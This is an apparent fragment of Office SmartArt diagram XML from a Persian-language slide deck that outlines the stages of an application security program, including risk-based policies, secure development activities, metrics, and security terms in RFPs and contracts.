            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>دستورالعمل های اطمینان را به درستی تعریف پوشش و سطح سختی مورد نیاز ایجاد کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2087855" y="1441015"/>
        <a:ext cx="5447044" cy="1039857"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="1343951"/>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fa-IR" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>رویکرد مبتنی بر خطر</a:t>
          </a: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1389784"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4264473" y="524142"/>
          <a:ext cx="109380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r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مجموعه ای از سیاست ها و استانداردهای متمرکز را ایجاد کنید که امنیت پایه برنامه را برای همه تیم های توسعه تطبیق دهد.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مجموعه ای از کنترل های امنیتی قابل استفاده مجدد را که به این سیاست ها و استانداردها مجهز است و مجموعه ای از دستورالعمل های طراحی و توسعه را در مورد استفاده از آنها تکمیل کنید، تعریف کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="r" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ایجاد یک برنامه درسی برنامه های امنیتی کاربردی که مورد نیاز و هدف های مختلف توسعه و موضوعات است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2084995" y="2810410"/>
        <a:ext cx="5452762" cy="987016"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094375" y="2686926"/>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fa-IR" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>فعالسازی یک بنیاد قوی</a:t>
          </a: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40208" y="2732759"/>
        <a:ext cx="847227" cy="1142317"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4348118" y="1866158"/>
          <a:ext cx="92651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just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تعریف و ادغام فعالیت های ایمن سازی و تأیید را در فرایندهای توسعه و عملیاتی موجود</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>فعالیت ها شامل مدل سازی تهدید، طراحی ایمن و بازبینی طراحی، برنامه نویسی امن و بازبینی کد، آزمایش نفوذ و اصلاح است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="just" defTabSz="488950" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1100" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>ارائه کارشناسان موضوعی و حمایت از خدمات برای توسعه و تیم پروژه برای موفقیت.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1100" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2076830" y="4227904"/>
        <a:ext cx="5469094" cy="836059"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="4029901"/>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fa-IR" sz="1050" b="1" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ادغام امنیت با پروسه های موجود</a:t>
          </a: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075734"/>
        <a:ext cx="847227" cy="1140399"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4258928" y="3207215"/>
          <a:ext cx="110489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just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مدیریت با معیارهای تصمیم گیری در مورد بهبود و تامین مالی بر اساس معیارها و داده های تجزیه و تحلیل داده شده رانندگی کنید. متریک شامل پیوستگی به شیوه های امنیتی و فعالیت ها، معرفی آسیب پذیری ها، آسیب پذیری ها، پوشش برنامه، چالش های نقص بر اساس نوع و تعداد موارد و غیره است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>تجزیه و تحلیل داده ها از فعالیت های پیاده سازی و تایید برای نگاه کردن به علل ریشه و الگوهای آسیب پذیری برای راندن پیشرفت های استراتژیک و سیستماتیک در سراسر شرکت.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>از اشتباهات یاد بگیرند و انگیزه های مثبت برای ارتقای پیشرفت ارائه دهند.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2085538" y="5488479"/>
        <a:ext cx="5451678" cy="997023"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="5370958"/>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5416791"/>
        <a:ext cx="847227" cy="1140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23715" y="-2186944"/>
          <a:ext cx="9265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just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>جمع آوری و مذاکره در مورد شرایط کسب و کار برای یک برنامه با کسب و کار، از جمله الزامات حفاظت در مورد محرمانه بودن، صحت، صحت و در دسترس بودن تمام دارایی های داده ها و منطق کسب و کار مورد انتظار.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>الزامات فنی را از جمله الزامات امنیتی عملکردی و غیرمستقیم تهیه کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="466725" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1050" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برنامه ریزی و مذاکره بر بودجه که شامل تمام جنبه های طراحی، ساخت، آزمایش و عملیات، از جمله فعالیت های امنیتی است.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" kern="1200" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1317069" y="110164"/>
        <a:ext cx="5339845" cy="836090"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1907"/>
          <a:ext cx="1115983" cy="105260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fa-IR"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مدیریت منابع و نیازها</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07238" y="53291"/>
        <a:ext cx="1013215" cy="949833"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3426427" y="-969455"/>
          <a:ext cx="112112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just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>شرایط لازم را با توسعه دهندگان داخلی یا خارجی، از جمله دستورالعمل ها و الزامات امنیتی مربوط به برنامه امنیتی خود، به عنوان مثال </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>SDLC، </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>بهترین شیوه ها.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>برآورده کردن تمام الزامات فنی، از جمله مرحله برنامه ریزی و طراحی، را ارزیابی کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>مذاکره با تمام شرایط فنی، از جمله طراحی، امنیت، و موافقت نامه های سطح خدمات </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>(SLA).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>اتخاذ قالب ها و چک لیست ها، مانند </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR" sz="1000" kern="1200" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:rPr>
            <a:t>نکته: این ضمیمه برای قانون قرارداد ایالات متحده است، بنابراین قبل از استفاده از ضمیمه نمونه، لطفا با مشاوره قانونی مشورت کنید.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" noProof="0" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1326566" y="1239864"/>
        <a:ext cx="5320849" cy="1011669"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1118209"/>
          <a:ext cx="1115983" cy="125497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1">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="fa-IR"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درخواست برای پروپوزال</a:t>
          </a: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(RFP) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fa-IR"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 و قرارداد</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332" y="1172687"/>
        <a:ext cx="1007027" cy="1146020"/>
      </dsp:txXfrm>
    </dsp:sp>
